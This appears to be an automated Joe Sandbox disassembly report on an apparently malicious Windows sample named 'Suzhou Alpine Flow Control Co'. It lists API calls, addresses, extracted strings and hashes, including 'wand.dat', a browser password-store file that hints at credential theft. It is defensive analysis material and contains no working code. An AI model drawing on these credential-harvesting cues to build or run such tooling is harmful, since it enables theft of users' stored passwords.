                                                                                                    • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                    • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                    • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                    • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040E770
                                                                                                    • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendmemset
                                                                                                    • String ID: AE$"
                                                                                                    • API String ID: 568519121-1989281832
                                                                                                    • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                    • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                    • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                    • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040D58D
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                    • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                    • String ID: caption
                                                                                                    • API String ID: 1523050162-4135340389
                                                                                                    • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                    • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                    • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                    • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                    APIs
                                                                                                      • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                      • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                    • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                    • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                    • String ID: MS Sans Serif
                                                                                                    • API String ID: 210187428-168460110
                                                                                                    • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                    • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                    • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                    • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassName_wcsicmpmemset
                                                                                                    • String ID: edit
                                                                                                    • API String ID: 2747424523-2167791130
                                                                                                    • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                    • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                    • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                    • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                                                    • API String ID: 3150196962-1506664499
                                                                                                    • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                    • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                    • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                    • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                    • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                    • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                    • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                    • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 3384217055-0
                                                                                                    • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                    • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                    • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                    • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$memcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 368790112-0
                                                                                                    • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                    • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                    • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                    • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                    APIs
                                                                                                      • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                      • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                      • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                    • GetMenu.USER32(?), ref: 00410F8D
                                                                                                    • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                    • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                    • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                    • String ID:
                                                                                                    • API String ID: 1889144086-0
                                                                                                    • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                    • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                    • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                    • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                    APIs
                                                                                                    • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                    • GetLastError.KERNEL32 ref: 0041810A
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                    • String ID:
                                                                                                    • API String ID: 1661045500-0
                                                                                                    • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                    • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                    • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                    • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                    APIs
                                                                                                      • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                    Strings
                                                                                                    • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                    • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                    • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                    • API String ID: 1297977491-2063813899
                                                                                                    • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                    • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                    • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                    • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040560C
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                      • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                    • String ID: *.*$dat$wand.dat
                                                                                                    • API String ID: 2618321458-1828844352
                                                                                                    • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                    • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                    • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                    • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                    • wcslen.MSVCRT ref: 00410C74
                                                                                                    • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                                                                    • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                    • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1549203181-0
                                                                                                    • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                    • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                    • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                    • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00412057
                                                                                                      • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                                                    • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                    • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                    • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3550944819-0
                                                                                                    • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                    • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                    • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                    • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                    APIs
                                                                                                    • free.MSVCRT ref: 0040F561
                                                                                                    • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$free
                                                                                                    • String ID: g4@
                                                                                                    • API String ID: 2888793982-2133833424
                                                                                                    • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                    • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                    • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                    • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                    • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: @
                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                    • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                    • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                    • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                    • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                    APIs
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                    • memset.MSVCRT ref: 0040AF18
                                                                                                    • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1865533344-0
                                                                                                    • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                    • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                    • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                    • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004144E7
                                                                                                      • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                      • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
